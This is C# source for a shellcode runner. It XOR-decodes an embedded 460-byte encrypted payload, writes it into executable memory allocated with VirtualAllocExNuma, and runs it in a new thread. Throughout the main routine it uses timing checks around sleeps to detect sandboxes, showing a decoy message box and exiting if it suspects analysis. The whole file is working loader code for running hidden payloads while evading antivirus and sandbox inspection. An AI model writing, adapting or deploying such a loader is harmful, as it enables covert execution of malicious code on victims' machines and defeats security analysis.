using System;
using System.Runtime.InteropServices;

namespace ShartShellCodeRunnner
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
            uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes,
            uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,
                  uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        public static extern int MessageBox(IntPtr hWnd, String text, String caption, uint type);

        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

        static byte[] decode(byte[] encoded, byte[] keys)
        {
            byte[] decoded = new byte[460];

            for (int i = 0; i < encoded.Length; i++)
            {
                //byte encodedByte = BitConverter.GetBytes(encoded[i])[0];
                //byte keyByte = BitConverter.GetBytes(keys[i])[0];

                var decodedValue = (encoded[i] ^ keys[i]) & 0xFF;
                decoded[i] = BitConverter.GetBytes(decodedValue)[0];
            }

            return decoded;
        }

        static void watcher()
        {
            var rand = new Random();
            for (var i = 0; i <= 0x3FFFF; i++)
            {
                var num = rand.Next(30,31);
                long result = 1;
                while (num > 0)
                {
                    result *= num;
                    num--;
                }
                var header = rand.Next(1000, 9999);
                //Console.Error($"{header.ToString()}: {result.ToString()}");
            }
        }

        private static int duration(int step)
        {
            var watch = new System.Diagnostics.Stopwatch();
            watch.Start();

            DateTime current = DateTime.Now;

            watcher(); Sleep(3900);
            watcher(); watcher();
            watcher();

            DateTime afterSleep = DateTime.Now;
            var difference = afterSleep - current;
            
            var tt = difference.TotalSeconds;
            watch.Stop();
            if (difference.TotalSeconds < 4)
            {
                Console.WriteLine("Provide the user name: ");
                var name = "x";//Console.ReadLine();
                MessageBox(IntPtr.Zero, $"Hello {step.ToString()} {watch.ElapsedMilliseconds}", name, 0);
                return 0;
            }

            var rand = new Random();
            
            return rand.Next(1, 1000);
        }

        static void Main(string[] args)
        {

            var round = duration(0);
            if(round <= 0)
            {
                return;
            }    

            byte[] encoded = new byte[460] {

0xbb,0x72,0x37,0x3c,0x76,0xff,0x63,0xe1,0x4e,0xee,
0x8a,0xf7,0xca,0xbf,0xf4,0x3c,0xc4,0xab,0x5f,0x4a,
0x9f,0x02,0x51,0xc1,0xf5,0xda,0xf9,0x12,0xe6,0xc9,
0x3f,0x92,0xa8,0x62,0xaa,0xcf,0xca,0xf1,0xbb,0x3f,
0x4f,0xa8,0x3d,0x22,0xaf,0x7e,0x7f,0xbd,0xba,0xaf,
0x25,0x0b,0x91,0x3a,0xac,0x29,0x12,0x58,0x0e,0x74,
0x90,0xa3,0xe2,0x99,0x92,0x66,0x9c,0xb0,0x97,0x19,
0x01,0x00,0xb7,0xf0,0x9f,0x22,0x8c,0xa9,0x48,0x58,
0xf9,0x8f,0x95,0xa2,0x7c,0xb6,0x99,0xeb,0xb8,0xd0,
0xda,0xf9,0x36,0x0d,0xdd,0x65,0x6e,0xb0,0x17,0x18,
0xfa,0x06,0xb1,0x6e,0x48,0x26,0xcc,0xb2,0xc0,0x43,
0xcf,0xea,0x26,0x25,0xd7,0x13,0x2b,0x3b,0xa7,0x82,
0x12,0x21,0xdf,0x2d,0xae,0x27,0xec,0x0a,0x93,0xcf,
0x4a,0x4f,0xaf,0xd6,0x11,0x40,0x3c,0xce,0x08,0xcf,
0xc1,0xd1,0x44,0x33,0x9c,0xb1,0x19,0x72,0x35,0x2b,
0xdc,0x38,0x6b,0x93,0x92,0x70,0xb2,0xc0,0x6c,0x6e,
0xa4,0x9c,0x40,0x86,0x21,0x99,0x1d,0xcb,0x70,0x64,
0xf6,0x6b,0x87,0xea,0xe8,0x24,0xf8,0x7d,0x15,0xad,
0x96,0xfa,0x6a,0xb1,0x6e,0x53,0x70,0x1b,0x3e,0x71,
0x6c,0xa2,0x0e,0x0a,0xce,0xa1,0x5b,0xc9,0x63,0x7f,
0xfd,0x6d,0xb8,0x99,0xb3,0xc8,0x73,0x9e,0x07,0x4d,
0x21,0x0b,0x80,0x68,0x00,0x58,0x2a,0xf7,0xfa,0xee,
0xfa,0x3f,0xff,0xf5,0x03,0xc6,0x22,0xea,0x77,0xb5,
0x9d,0xab,0xfe,0x39,0x39,0xf7,0x9a,0x7e,0x07,0xcb,
0x79,0x8a,0x08,0xb7,0x17,0x5a,0xb8,0x7f,0x92,0x2b,
0xb2,0xd7,0x2b,0xf1,0x2f,0x98,0xd4,0x4a,0xcb,0x3f,
0x07,0x04,0xf9,0x49,0x0d,0xe9,0xc1,0xef,0xe7,0x3b,
0x4f,0x6c,0x21,0x67,0xe9,0x6a,0x74,0x71,0x48,0x63,
0xbb,0xa5,0xa7,0x77,0x82,0x77,0x96,0x46,0x39,0x1b,
0x13,0xba,0x67,0x35,0xf3,0xc7,0xa0,0xb2,0x8b,0x9a,
0x3e,0x7a,0x70,0x33,0x22,0x53,0xcd,0x7f,0xb1,0x0d,
0xbb,0xdc,0x78,0x75,0x58,0x1c,0x4a,0x6c,0xc5,0x62,
0xc0,0x33,0xb0,0xb2,0x8f,0xe2,0x7f,0xec,0xce,0x03,
0x5d,0x7a,0xe2,0x61,0x3e,0x92,0x8f,0x04,0xaa,0x22,
0x71,0x5c,0xa2,0xce,0x79,0xae,0x58,0x5e,0xa1,0x0c,
0x68,0x48,0xa6,0x06,0x15,0x7c,0xcf,0x0b,0x44,0x36,
0xab,0xae,0x48,0xb1,0x64,0xf9,0x62,0xc5,0xa2,0x16,
0x0a,0x57,0xf3,0xe7,0x77,0x89,0x6c,0x5b,0x43,0xba,
0x68,0x07,0x82,0x6e,0x2c,0x72,0x15,0x55,0x32,0x95,
0x22,0x14,0x43,0x2f,0x77,0xd4,0xcb,0xbc,0x08,0xff,
0xe3,0x63,0xee,0xa8,0x6f,0x72,0xed,0x84,0x60,0x7e,
0x9e,0xd5,0x7d,0x9e,0x8d,0xa7,0xf8,0xa6,0x3c,0x5c,
0x7b,0x20,0xa6,0x97,0xca,0xfc,0x9f,0xc5,0x89,0xec,
0xfa,0x72,0xc5,0x2d,0xd2,0xa3,0x30,0x08,0xda,0x3e,
0xc2,0x9f,0xaf,0xf8,0xb6,0x76,0xaf,0x0a,0xe6,0x69,
0xb2,0x22,0x93,0x9c,0xb6,0x9c,0x48,0x7a,0x83,0x94 };

            var line = duration(1);
            if (line <= 0)
            {
                return;
            }

            byte[] keys = new byte[460] {

0x47,0x3a,0xb4,0xd8,0x86,0x17,0xa3,0xe1,0x4e,0xee,
0xcb,0xa6,0x8b,0xef,0xa6,0x6d,0x92,0xe3,0x6e,0x98,
0xfa,0x4a,0xda,0x93,0x95,0x92,0x72,0x40,0xfe,0x81,
0xb4,0xc0,0x88,0x2a,0x21,0xbd,0x9a,0xb9,0xb4,0x88,
0x05,0xe2,0x70,0x13,0x66,0x36,0x4e,0x7d,0x16,0x93,
0x44,0x77,0x93,0x16,0x8c,0x68,0xd3,0x91,0x03,0x35,
0x91,0x62,0x00,0x74,0xc0,0x27,0xcd,0xf8,0x1c,0x4b,
0x21,0x8b,0xf5,0xcc,0xd7,0x23,0x5c,0x22,0xc8,0xd0,
0xf9,0x8f,0x95,0xea,0xf9,0x76,0xed,0x8c,0xf0,0xd1,
0x0a,0xa9,0xbd,0x45,0xc5,0x21,0xe5,0xf0,0x37,0x51,
0xfb,0xd6,0x52,0x38,0x00,0xd9,0x05,0xf3,0x4b,0x77,
0x47,0xa2,0x27,0xf3,0x9a,0x22,0xe2,0x73,0x96,0x42,
0xbe,0x60,0x1e,0xe4,0xa3,0x66,0xed,0xcb,0xab,0x2f,
0x3f,0xbe,0xe3,0xd5,0x5d,0x64,0x34,0x8b,0x31,0x1e,
0xb4,0x09,0x1c,0x77,0x17,0xf1,0x3d,0x3b,0x34,0xfb,
0xba,0x79,0xe0,0x9f,0xda,0x34,0x39,0x80,0x70,0x27,
0xa5,0x4c,0x01,0x0d,0x25,0x11,0x55,0xca,0xa0,0x25,
0xae,0x2a,0xdf,0xb4,0xb1,0x7e,0xb9,0x25,0x54,0xf4,
0xd7,0xa0,0x22,0x32,0x82,0x73,0x31,0x49,0xc1,0x91,
0x34,0xe3,0x57,0x50,0x86,0x2a,0x49,0x20,0x34,0x80,
0x02,0x92,0xe5,0xd0,0x0d,0xbf,0x00,0xac,0x58,0x7e,
0x13,0x0b,0x80,0x29,0x56,0x11,0xa3,0x11,0xb2,0x6f,
0x16,0x9f,0xfe,0xf5,0x03,0x8f,0xab,0x0f,0x3e,0x09,
0x9f,0xab,0xff,0x82,0xf9,0x5f,0xab,0x48,0x46,0x9f,
0x30,0x03,0xec,0xfb,0x9e,0xab,0xf9,0xc5,0xde,0x5c,
0x94,0xd0,0xd4,0x24,0x63,0x11,0x3e,0x22,0xca,0x3e,
0x07,0x04,0xa0,0x08,0xb7,0xc0,0x41,0x84,0xe7,0xc4,
0x9a,0x3c,0x71,0x2a,0xd8,0xa3,0x39,0x40,0x88,0x2b,
0x44,0x65,0xef,0xfe,0x40,0x3f,0x69,0x86,0x71,0x92,
0xd2,0xfb,0xdd,0xdf,0xfc,0x18,0x40,0x4d,0x5e,0xd2,
0xb7,0xbd,0x1a,0x23,0x63,0x0b,0x81,0xf6,0x53,0x45,
0x32,0x25,0x39,0xcf,0xc1,0xb9,0x3e,0x0d,0x3a,0xb7,
0x88,0xb2,0x74,0xf2,0x8d,0xe2,0x7f,0xa5,0x76,0x60,
0x30,0x1e,0xe2,0x61,0x3e,0x92,0x8f,0x45,0xfa,0x63,
0x21,0x14,0x2b,0x2c,0x2e,0xf9,0x0f,0x13,0x90,0xcc,
0x02,0x45,0xff,0x47,0x45,0x9e,0x33,0x6d,0x83,0x72,
0x8f,0xfa,0x49,0xb0,0x2c,0x74,0x26,0xe1,0xba,0xd0,
0x0a,0x3f,0xbb,0x6e,0x91,0xdf,0x3c,0x1a,0x13,0xfb,
0x38,0x46,0xd2,0x27,0xd3,0xb2,0x54,0x05,0x7b,0x6a,
0xea,0x59,0xca,0xee,0x3b,0x5d,0x0a,0xfd,0xb2,0x86,
0x2f,0x5c,0x68,0x57,0xba,0x3a,0xdc,0x56,0x28,0x81,
0x54,0x5e,0x73,0xdf,0x37,0xaf,0x7f,0xbb,0x5c,0xa3,
0xae,0x9b,0x56,0x22,0x68,0xaa,0xde,0x7f,0x2f,0x79,
0x47,0xef,0x3a,0xf8,0x9a,0x20,0xf4,0x20,0xe6,0x38,
0xbe,0x95,0x2f,0x03,0x56,0x03,0xaa,0xb1,0xa1,0x7a,
0xc0,0x4d,0xf9,0x9c,0xef,0xdd,0xc1,0xa0,0x7c,0x41
            };

            var triangle = duration(2);
            if (triangle <= 0)
            {
                return;
            }

            var decoded = decode(encoded, keys);
            int size = encoded.Length;

            var square = duration(3);
            if (square <= 0)
            {
                return;
            }

            //IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
            IntPtr addr = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x40,0);

            var elipse = duration(4);
            if (elipse <= 0 | addr == null)
            {
                return;
            }

            Marshal.Copy(decoded, 0, addr, size);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
                IntPtr.Zero, 0, IntPtr.Zero);

            var hexangle = duration(5);
            if (hexangle <= 0 | hThread == IntPtr.Zero)
            {
                return;
            }

            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}
